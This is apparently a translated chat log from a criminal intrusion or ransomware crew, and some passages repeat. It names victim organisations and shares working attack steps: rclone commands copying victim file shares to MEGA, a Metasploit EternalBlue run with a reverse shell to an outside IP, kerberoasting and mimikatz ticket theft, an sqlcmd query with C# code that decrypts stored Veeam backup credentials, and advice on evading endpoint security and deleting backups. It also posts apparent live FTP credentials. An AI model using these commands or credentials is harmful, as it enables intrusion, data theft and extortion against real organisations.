rclone.exe put it in the folder you need, then follow the manual. clone everything you need. everything is downloaded via the clone, so the download speed is high. Here's the guide. It's simple https://rclone.org/mega/ next command to download rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 remote:NT - change only this. "remote" is the name of your mega. "NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself. example rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 Happy Christmas Eve to everybody! :) Happy New Year to all !!! Happy New Year to all !!!) :partying_face: :tada: Happy Holidays to all) Happy New Year !!! :champagne_glass: in the profile search for wusa Remind pliz how to fix it in cobalt? [-] could not spawn C:\Windows\system32\wusa.exe: 740 ``like redirecting from local to domain, try domain`` next credits maybe someone has encountered this issue... need to remotely enable port 3389 RDP on the LA (local admin) guys who encountered such a message? what is it in general and how to bypass @all d-box.com - whose fortik @all groupemontoni.com - whose fort? I repeat! execute-assembly https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon hello everyone, does anyone have instructions on zerologon and proxylogon? who has encountered this error? ``` msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 5.199.174.223:4444 [-] 172.31.30.188:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
This is the first time I've had such a mess and problems ¯\\(ツ)_/¯or for example the 3rd issue, we have two hosts, one of which was mentioned above and everything runs fine, let it be host1 and host2 where remote commands can not go through and only go through rip and let it go through the console For example, let's take a batcher on host2 . So when I go to rndp on host2 and trying to edit / change the text batch or just delete it he writes that I do not have the right to do it (batch file is in the classic programdata) but if I go to host1 and in the file browser to move to \host2\C$\programdata then I can easily delete that batch or copy a new one from host1 did not say the wrong session, I meant the logged in user on the host, about rdp - as an option, try to migrate to the system process, so you after logging off the session did not fall off it is either a bug or a feature) ` `. >When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rndp and starting the same batnick, for example, everything is started normally. ``` I also met this once, what is it, I do not know, but most likely in the settings ADGod need advice. What can it be ? The symptoms : 1oe There is an account YES which normally goes everywhere. When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rdp and starting the same batnik for example, everything is started normally. 2o There is a session from this user on one of the hosts where everything works fine when you connect to other hosts by rdp (tried 5-7 hosts) and close the window rdp session, the account is unlogged. Roughly speaking, I can not let the process and close the RDP window, the process will be executed only when the active RDP session. While on the same host as I pointed out above is not observed. What can it be? Some tricky settings in the GPO? 
Why on hrdp I can execute commands and remotely remotely does not work, On one host the account works fine and closing the RDP window the processes work and on other hosts there is a "logout" PS Maybe some kind of glitch? I could not in the beginning randomly out of 100+ hosts to choose exactly the one on which all works well do not see#1.done.ohiodominican.eduNashee have access to soks? luks hangloloyalnoda like on injekt it more lesses bitdefender lsass who removed? or how to inject\style the process polozak? have a clipboard grabber? share plz @all groupemontoni.com - whose fortik? @all d-box.com - whose fortiks diskinventory this must be removed from the list but left on the hard and remove from the drive it from the hardavo you see there from the inventory and from the drive, from the drive as I understand it should? not done in a long time) @all just in farnese, better ask again) who online, remind pliz to completely remove the backup, which button to press, from the inventory or drive (I assume that the drive) spsklient? have anyone who has faced, tell me, RedCloack AV on mimic sizzles? gentlemen if someone says so - write to PM Alexandar Yerminov, aka veger in lss) or those who are there for backup in fact do you try just rdp to go to the server, viam, open the console and enter the creds domain admins? Guys who found the central server viama (to decrypt), through the proxy server viama, removed the task list of each server, went to all servers that have the process viama 1. the server on which the viam console, runs viam services but does not spin skl server 2. on the servers where both you services and sqlservr.exe are running - no port detected by the PID of sqlservr.exe process help who faced the problem is anyone online? 
need help when working with lsass thanks) it pulls SharpChromium from the github, collects all chrome browsers there was some cna script from the chinese. pulled it like. from the user context switch someone pulled passes from microsoft edge via mimic? what command to pull? thanks) take 2 Ubuntu 18.04, watch this video and configure) ``https://www.youtube.com/watch?v=lT1dhfRKPwo Ubuntu 18.04 !!!`` and never been banned, I just googled for this purpose which accepts bits and does not ban for lifting the vpn hello all, advise a good hoster to lift the vpn on the server, thanks in advance) ``Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzW1N1arhNiY`` look, whose is it? maybe someone has a script or a program you can advise? or what kind of logs are you going to clean? the detective it build? :thumbsup: hello if you have a problem with the rise of the session ks\msf - come on, there is a solution in the new rocket it is already there and do it so do it periodically pass the session no on vpn net sessions want to tell all? We are Wolt (belongs to Food & Beverage) from Germany. Our Site is: wolt.com ``whose case?`` suddenly got in touch with the old someSteven like) Thanks http://vc.ru/newtechaudit/108392-kak-posmotret-istoriyu-usb-podklyucheniy-k-stacionarnomu-kompyuteru-noutbuku http://pyatilistnik.org/kak-udalit-dannyie-o-usb-fleshkah-v-reestre-windows/ no system can remove them yet. so they get burned when information is dragged by an insider in the event log? but definitely saw this somewhere long ago . there icons \ numbers from flash cards where - can't say in the registry is there thanks, posyal in the history of backup jobs it may be backup panel you need to look at it to monitor the time of connection and if so hope to know if it's true there is an idea that they write to the removable drives straight history?
most likely no way Good evening everyone, tell me - how can I look history of connected disks or removable media?i found sharpweb's hash, i'm looking for it badly. sharpweb can't do it, and sharpweb can't do it, but there's no compiled one, and invoke doesn't want to do it with history and nfua than to save history in browser and inexplorervampir how much broskerberos hash?hashes on the brute force you can throw meopotom will be farm, there are already working if you're about "kerberos hash" then look for someone with a farm, now we have a team as far as I know no one with a farm for brute force on cmd5.orgwhere do you brute force hashes?the username does not have admin rights again, looking at whether or not you have LAPS or take off the local admin and try it if you have rights for the logged in user, you can try to neighboring hosts his accountS Name: Microsoft Windows 10 Pro OS Version: 10.0.19041 N/A Build 19041 and on the user computer has system rights, win10 proms17 bypassed, triedC:\Temp>net accounts Force user logoff how long after time expires?: Never Minimum password age (days): 0 Maximum password age (days): 42 Minimum password length: 0 Length of password history maintained: None Lockout threshold: Never Lockout duration (minutes): 30 Lockout observation window (minutes): 30 Computer role: SERVER The command completed successfully. C:\Temp>If your goal is not to study the math, but to get ahead as fast as possible, then fuck with ms17 and try it) Firstly, it is not certain that you will unboot this sqluser (see password policy in the corp, if it is hard, then forget it) secondly, it doesn't mean you'll get out from under MSSQL (can you do xp_cmdshell?) i'll tell you about your situation. 
the point is that until you understand what the fuck it is and what kind of hashes and tickets you can't experiment it won't let you go anywhere because the user has no rights) i experimented[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=4GWTca9k9tLBhidBj) shortest way to brute force this hash, service suggestion? well you can experiment here's PTT like do http://www.tarlogic.com/en/blog/how-to-attack-kerberos/ and what options do you want besides brute force? pc4 you have there I understand you have no options? and you can brute force account sqluser you have a ticket for access to MSSQL

```
Client: web @ site.site.NO
Server: MSSQLSvc/sitefil2.site.site.no:1433 @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/3/2020 15:43:35 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
```

```
[*] SamAccountName : sqluser
[*] DistinguishedName : CN=sqluser,OU=servicekontoer,OU=Brukere,DC=site,DC=site,DC=no
[*] ServicePrincipalName : MSSQLSvc/sitefil1.site.site.no:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.no
```

fuck it gives me a [ez vyt tuj dslftn I do not understand if there is no ticket sqluser see what stage you have a hitch? 1) you request tickets 2) you unload them from memory to disk 3) you brute force 4) PROFIT chel, I don't get it. I used empire and psh invoke to give out kerberoast where did you "get it"?
and where do you see it if you say it's not in memory? it's a MSSQL account on some server, there's no such ticket from this user, it's not a hash fuck I wrote, I did a kerberoast and got the hash of the domain user : $krb5tgs$23$sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433 tralya I have a hash from admin, but they are from the current username. Yes, these tickets you have two options, either you're smoking a match on kerberos and on the attack kerberoasting, or stupid you learn commands in mimic then you unload from memory to disk that you have tickets were not only the current user you first need to ask them when you throw tickets to the brute force, he takes the dictionary, converts the password into AES-256 and tries to decrypt, where decrypted - bingo

> KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96

this isn't a hash, it's a ticket: $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433*

```
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>klist

Current LogonId is 0:0x5d20442

Cached Tickets: (9)

#0>     Client: web @ site.site.NO
        Server: krbtgt/site.site.NO @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwardable renewable pre_authentic name_canonicalize
        Start Time: 11/3/2020 14:41:29 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x2 -> DELEGATION
        Kdc Called: sitefil2.site.site.no

#1>     Client: web @ site.site.NO
        Server: krbtgt/site.site.NO @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authenticating name_canonicalize
        Start Time: 11/3/2020 14:41:26 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: sitefil2.site.site.no

#2>     Client: web @ site.site.NO
        Server: MSSQLSvc/sitefil2.site.site.no:1433 @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 15:43:35 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#3>     Client: web @ site.site.NO
        Server: WSMAN/sitefil1.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 14:59:41 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#4>     Client: web @ site.site.NO
        Server: cifs/sitefil2.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 14:41:39 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#5>     Client: web @ site.site.NO
        Server: ldap/sitefil2.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 14:41:29 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#6>     Client: web @ site.site.NO
        Server: cifs/sitefil1.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 14:41:29 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#7>     Client: web @ site.site.NO
        Server: ldap/sitefil2.site.no/site.site.no @ site.KUMER A.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 14:41:28 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#8>     Client: web @ site.site.NO
        Server: LDAP/sitefil1.site.no/site.site.no @ site.KUMER A.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/3/2020 14:41:28 (local)
        End Time:   11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

C:\Windows\system32>
```

and the ticket list gives the current user's tickets, I made a kerberoast and got the hash of domain user : $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433* tralalya da not understand a fuck if you for example climbed on the host, where the domain admin token hangs you can steal it and go on with it if I understand your question correctly you can and PTT can not do with this ticket? without an account? sandki) aaaa do it pwd either on the server in the cob or on the client where pwd where did it save it did mimikatz kerberos::list /export (the article says it all) klist 7 tickets in memory like how to see it? is it in memory? how, I can not export it but the principle is the same you can export a ticket to memory and get the same .kirbi. on the seclab there's a manual how to build a Kirby agartt it's when you already have a pass from the domain admin or other privileged account pass as ze ticket is a little different http://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257ae pretty I gave above 2 links) there is a manual how to do it export the ticket from memory to disk how to get kirbi? the complexity of the brute force (any) depends on the hash algorithm, the password policy and your brute force capability, if you mean it i missed the point, it's all about ntlm talking about kerberos hash net ticket - it has an extension .kirbi hold http://www.securitylab.ru/analytics/496049.php https://ru.wikipedia.org/wiki/Kerberos#%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%8B https://hashcat.net/wiki/doku.php?id=example_hashes 7500 Kerberos 5 AS-REQ Pre-Auth etype 23 $krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363136313233383835 not hash is yes ))) if it is a ticket then how to make .kirbi if it is a ticket and not hash) and then what can be done with this pass, and the ticket?
and if it is a ticket then how to make .kirbytam in addition to the service accounts there are also ordinary users, well, there as luck krchto difficulty brute-force ticket depends on what password is on the service account, it may be a generic, or password1 and it's not called "kerberos hash", you brute-force tickets depending on which spn you brute-force, how do you tell13100 Kerberos 5 TGS-REP etype 23 $krb5tgs$23$*user$realm$test/spn*$passes are usually complex or not?but kerberos hashes, it is similar to ntlm2 if there are a bunch of them and simple polzakov then brute-force quite - usually polzakoviki easy passwords put, the admins have more complex than relay and brute-force do not do anything brute-force hardNTLMv2 relay.kirbi not make with him with hash? logged in somewhere and if not brute force it does not apply in any way more yes?[ ](https://stylebrooks.com/group/discussion?msg=yy3FBeoLNKGRZBpze) this is a network hash. it is possible to brute-force hash I mean, if there is hash NTLMv2 with it there is nothing to do except brute-force? you can collect through user's PID. who knows how to use kerberoast hash in the system context? edr_quey install the pluginSave who has the process name - the names of all major av2 commands from the system and rdp off this fuckin@Shved finally found how to bypass Duo Security ``https://help.duo.com/s/article/1088?language=en_US ``@Air pour the date here into the generalinsulation.com folder and let me know how it's done ``` 172.82.162.66 admin 3cT26dDrDCwS ftp 21 port ``but you will write @twinbtsxjckg5tgag3via6wi7irpywl6w2fh66pmwt6zlbf5vlyyvnjjxcad.onion vampir BYI245Y52NCndjjYRhRmZaologize and write twinook now I'll give you a new account, we have not a big reorganization Greetings, has anyone run into a Cortex XDR? Some kind of monitoring, like av, blocks everything, any activity on the network. Can bring it down can be how that, cuts down even the white software to close processes. 
Manually kill the system does not work. Clean dll, exe, psh does not let the rest of it. if you're paranoid ``` = )there speed is even worse)if paranoid - there is i2p plus considering the fact that the control of a huge number of NODs for the NSA... otherwise in the lagging I don't use torus I don't know what the fuck is the point of installing torus on the output? after that the speed will not be more than 5mb better the opposite you can mix and match your purchase - and then your[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=y5tx4nRP8mYKGp7Zb), for example, the input will be your own VPN, and the output will be purchased, the output will be torrent, so it will be harder to find even just your VPN, aypy and of course never sit from home internet and only a modem, + change the whole chain every month and / or after a large payment I'm interested in your opinion) I saw an article on various vpn, including when you raise your own vpn or buy from some company. So, discussed the investigation of the various structures and the search for a man using a VPN from any fee office, the structure may apply to this office to provide a VPN (which allegedly does not see the log), to pay her or under some other pretext to get your ip connection. Discussed the same creation of its VPN, but the question is, when we raise your VPN, we also take a service that prevents the same structures find out from which service the IP VPN and do the same thing as a paid office that provides a VPN service?) + has already suggested) tupunulbladhoundParni! Hi all! What are the alternatives to UserHunter? Ways to accurately pierce the admin's PC? 
uH do not help if you delete instance with backups no nu again about asurbackups, if you delete them from the cloud, will they restore or not in the very first in which folder in viam can see jobes))= )pbs)ur welcomehttps://www.vishalon.net/blog/commands-for-using-standalone-7-zip-to-split-and-combine-zip-fileкак make it through a goo understandable, and how to do and can you with 7za console also interested in or if you know how you can archive a folder, say, that when archiving the archive beat into parts by 1gb for example?it would be more convenient to give a number of say, the first 20, then the next and so on and so on. would it work with 7z.exe? just give an example how to archive the first 20 files from the folderbro, how to archive all the folders I know. i am interested in the exact moment of flags, etc. how do i record it correctly? Can anyone suggest how to carefully archive files from the folder in Bicon, but not all, and selectively. say the first 20, then the next, etc., or say based on the weight or letter which begins with the files in the folder. alright, fuck them, the other will switch to a palevnoe, but there as luck would be) Well, small a lot of disk will be loaded, lags ... another thing, if he wants to download some of the files, the speed is also not great there are small files, just their much think lagged strongly will ? )so he has work it locate will start, the network will take a discriminating, please advise whether it will be palevoe to raise a VPN to the bot, climb into the right folder through Explorer and download the files from there, provided that this occurs during working hours ? i can see all the files in the datastores and do whatever you want, located directly in the panel vime -> fileso, by gut instinct i found it, maybe you need a root pass more enter or in this spirit i can not see how to google, i agree with you, i can't see how i can google it, i agree with you. 
it should be possible but you also need to delete it because veeamzip is a utility. in short, you can zip it to an archive with a password right through vimeam lolno i'm going to check with the console. it's not a snapshot, it's a replication of veeam exagrid but it uses one fuckin' thing, i've uploaded it above. i think i have this script, i made it up) just doubt that it will give anything, although you can try just erase it is unlikely option, and how to archive i actually do not remember it does not really matter even how we pull the access, i do not know what to do then with these replications on the addyndun i also think so, so i have to fuck my brain with vimopo dns resolves ipi and that's it, reqest timeouts with dk and try to either offe or for farmerd, but the problem is that tech hosts are not available or parser of event logs with cd>what is the script that at dc looks when and in what pc was logged into the username? userhantere looked it up, there are really creeds like root ****** by https esxi> and you have a wiiim connects to this storage to back it up or to put a backup there? there's a script that looks up when and on what pc the user was logged in? i also have a question, what to do with these replicas i remember when i was there, i packed it in an archive with a password, but i can't even fucking sneak the 7z in there, i don't remember how we archived the whole castrated linux thing, all right there's hardware like dell poweredge and there's a raid disk array connected to it, did the servers themselves get into esxi through cc?maybe i won't have to fuck around. you led me to believe that it makes sense to check the domain authorization on the esxi hypervisor i didn't go into the hypervisor. i think so, but i'm more worried about storage. 
i think it just has a root account in the vim though i will check about the root in gooytes, maybe i fucked up there are also virtual hard drives, replication is flying to esxi storage the credentials for connecting to it says root ******** much i need them you mean there should be root passes to hypervisors too? maybe someone has been in the database and knows where something is there

```
SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];
```

this line should be changed, because the credentials for the storages are obviously not there.

```
tasklist /v
netstat -ano
```

Look for MsSQL port by PID in 2 outputs, find where sqlcmd.exe is located

```
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,found_port -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];"
```

option -y0 is mandatory otherwise sqlcmd cuts the output. Then you take this code

```csharp
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
    internal static class Program
    {
        private static void Decrypt(string b, string a)
        {
            if (string.IsNullOrEmpty(a))
            {
                return;
            }
            byte[] encryptedData = Convert.FromBase64String(a);
            Console.WriteLine(b + ':' + Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));
            return;
        }

        private static void Main(string[] args)
        {
            Decrypt("optional username", "here is the hash from the sqlcmd output");
        }
    }
}
```

a separate Decrypt function call for each hash. You type `c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs`, you drop the exe on the server with the veeam and run it. I have a mini-manual here, but I'm not sure if it will work on the storages specifically, to the storages and not to the vim panel itself. who had a chance to rip the hypervisor/storages codes out of vim? i remember?
https://github.com/tnpitsecurity/ligolo-ng Tunneling, better than socks, uses tun interface! what is kana? in the kana which you added prilovet I'll raschbiruyutsya that network without delavsya hello there peresnimi it tomorrow look at?? scanner to look for cars all hello. Perhaps the topic was raised, if someone has solved it - write in person, please. When connecting to Fortica `ipconfig /all` gives google DNS records. Next is not clear how to scan the grid, what would at least somewhere to get through. The keylogger esxi was sent for fixing, do not use it yet, there is one bottleneck where it can get in the way. hi, notifications with text appear in the chat, and the chat does not show shit and is displayed as unread. Check for connection. To do a profile search for wusa. Remind me please, how to fix it in cobalt?

```
[-] could not spawn C:\Windows\system32\wusa.exe: 740
```

like redirecting from local to domain, try domain next credits maybe someone has encountered this issue...
need to remotely enable port 3389 RDP on the LA (local admin) guys who encountered such a message? what is it in general and how to bypass @all d-box.com - whose fortik @all groupemontoni.com - whose fort? I repeat! execute-assembly https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon hello all, does anyone have instructions on zerologon and proxilogon? who has encountered this error?

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 5.199.174.223:4444
[-] 172.31.30.188:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
```

This is the first time I've had such a mess and problems ¯\\(ツ)_/¯ or for example the 3rd issue, we have two hosts, one of which was mentioned above and everything runs fine, let it be host1 and host2 where remote commands can not go through and only go through rdp and let it go through the console. For example, let's take a batcher on host2. So when I go to rdp on host2 and trying to edit / change the text batch or just delete it he writes that I do not have the right to do it (batch file is in the classic programdata) but if I go to host1 and in the file browser go to \\host2\C$\programdata then easily I can delete that batch or copy a new one from host1. did not say the wrong session, I meant the logged in user on the host, about rdp - as an option, try to migrate to the system process, so you after logging off the session did not fall off it is either a bug or a feature)

> When trying to execute commands remotely under this account (tried psexec and wmic) gives out "access denied" but going by rdp and starting the same batnik, for example, everything is started normally.

I also met this once, what it is, I do not know, but most likely in the settings AD. God need advice. What can it be? The symptoms: 1st There is an account YES which normally goes everywhere.
When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rdp and starting the same batnik for example, everything is started normally. 2o There is a session from this user on one of the hosts where everything works fine when you connect to other hosts by rdp (tried 5-7 hosts) and close the window rdp session, the account is unlogged. Roughly speaking, I can not let the process and close the RDP window, the process will be executed only when the active RDP session. While on the same host as I pointed out above is not observed. What can it be? Some tricky settings in the GPO? Why on hrdp I can execute commands and remotely remotely does not work, On one host the account works fine and closing the RDP window the processes work and on other hosts there is a "logout" PS Maybe some kind of glitch? I could not in the beginning randomly out of 100+ hosts to choose exactly the one on which all works well do not see#1.done.ohiodominican.eduNashee have access to soks? luks hangloloyalnoda like on injekt it more lesses bitdefender lsass who removed? or how to inject\style the process polozak? have a clipboard grabber? share plz @all groupemontoni.com - whose fortik? @all d-box.com - whose fortiks diskinventory this must be removed from the list but left on the hard and remove from the drive it from the hardavo you see there from the inventory and from the drive, from the drive as I understand it should? not done in a long time) @all just in farnese, better ask again) who online, remind pliz to completely remove the backup, which button to press, from the inventory or drive (I assume that the drive) spsklient? have anyone who have faced, tell me, RedCloack AV to mimic sizzles? gentlemen if someone says so - write to PM Alexandar Yerminov, aka veger in lss) or those who are there for backup in fact do you try just rdp to go to the server, viam, open the console and enter the creds domain admins? 
Guys who found the central server viama (to decrypt), through the proxy server viama, removed the task list of each server, went to all servers that have the process viama 1. the server on which the viam console runs viam services but does not spin sql server 2. on the servers where both you services and sqlservr.exe are running - no port detected by the PID of sqlservr.exe process help who faced the problem is anyone online? has anyone encountered? put openvpn by script on debian, when connecting client gives error:

```
2021-08-17 15:49:18 Insufficient key material or header text not found in file '[[INLINE]]' (0/128/256 bytes found/min/max)
2021-08-17 15:49:18 Exiting due to fatal error
```

[ ](https://stylebrooks.com/group/general?msg=uCCqMeZ3oTQAbJX9F) @Tyr @all beep who worked with hashcat, dictionaries. need a little advice, skype sites where you can watch Asian companies rhubarb...
On zuminfo almost no one from Asiahttp://github.com/21y4d/nmapAutomatorNew 0-day ;) Better ideas nakidite che present :) Ladies, if any of us, congratulations on the holiday! :) I have not tried it myself) write me back as you turn out please Thank you I'll try everything I understand. Export-PowerViewCSV - thread-safe CSV append `````` Export-PowerViewCSV - thread-safe CSV append Resolve-IPAddress - resolves a hostname to an IP ConvertTo-SID - converts a given user/group name to a security identifier (SID) Convert-ADName - converts object names between a variety of formats ConvertFrom-UACValue - converts a UAC int value to human readable form Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object Remove-RemoteConnection - destroys a connection created by New-RemoteConnection Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token Invoke-RevertToSelf - reverts any token impersonation Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN) Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion ``misc functionshttps://academy.hackthebox.eu/course/preview/active-directory-powerview/powerviewsharpview-overview--usage[ ](https://stylebrooks.com/group/discussion?msg=GeticYLfEDdD5Wiz5) this is how? I understand that it's not difficult just somehow never had a chance to get the log from there in a couple of minuteswhy? it's very simple try a miscomany never tried but I will have somewhere in the log you need the root from the server with the cobalt do not know you can get the log output from sftp in a couple of minutes? and in the console? no way? 
you can get the log output from sftp baconGod there is a trivial question how to display the result of the command in a txt file when you execute the execute-assembly The command itself `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon ` I tried `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon >> C:\file.txt `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon | Out-File -FilePath C:\file.txt -append -force -encoding UTF8`Hmm, not helpful.Got it, thanks, @slice! @t3chnolog question on your manu with NTDS, tried `Esentutl /p C:\log\ntds.dit` to fix the ntds file, but requests a certain ntdsai.dll, where to get it and where to put? have an interesting and important questionBarracuda Backup Server 490 - but specifically with these gearsanyone has experience with barracuda backups? anyone got any domain registrar logs sellers? i have a synology nas in my case. is there a google drive cloud sync enabled, what are the deletion options ? and does google restore deleted drive files ? @all can someone pass the session from a x64 car ? @all friends who are there free and without tasks, beep me in pm not a bet)toulouse by the way is handy)))) and not cna at all, does not integrate directly with coba is it a script ?) https://docs.microsoft.com/en-us/sysinternals/downloads/psexec you mean this script?)hello everyone, who knows a cna script with these arguments? >psexec [hostname] [share] [listener]@all write to anyone who needs a session to redo, right in the workplace on this case where you need a freshThe question as above advised through ftp server on the dedicates, filezilla put 5 minutes, then through the clone pull, very surprised speed, 46 gb for an hour and a half did[ ] (https://stylebrooks.com/group/general?msg=5KZsucuYmrv24D8TX) found a version of this. if relevant scribble 5-10mbps really. 
onyon back repurposed kekhoroshy analogue) I just rented a server at 32tb and there I download by ftpstalked that the case is limited to the use of mega, there are still some good analogues, preferably with btk payment ?yes, it will take some time to weigh all the same, won't it ?well thank you and that's it) you can somehow use wmik, the syntax would be correct da well, it's too long...see in the last line of the outaptu ``dir /s E:\YouDocs > log.txt ``How do I check the size of a certain folder? dnscmd /enumzones > AllZones.txt for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt ` `remember плиз command poll DnS with dk@all who needs 2fa to take over the sonics? now really do if the log will not be then try the user to write it, from whom you start vmikflag -P plug in and add at the end >> C:\stat.logI was just interested in the statistics. In any case, thank you.@lexman wait, but it's just start and check, without the ability to periodically see the statistics of the upload, as with the flag `-P`, right? I will add, before starting check that the system rights on the remote machine was enough to go to a given diRight, thanks. The variant with wmic is also interesting, @lexmandaThe whole output will go into session, yes? `shell rclone.exe copy "\\host\F$" mega:/ -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P `all output into session. flag `-P `you use and all or ` --progress `thank you! Yes I will explain in detail, please, or give example? Perhaps others will also be useful.rklon command put in the baton, run through wmic it worksGod, is there any way to run rclone from bacon, and then periodically check the progress? https://www1.appliedsystems.com/en-us/resources/videos/applied-csr24/https://portal.csr24.com/ - has anyone come across? stewart can fill a bunch at once a free service for cracking hasheshttp://crackstation.net/sends backups to the cloud, in the account is a pass, but is there an option to get it? 
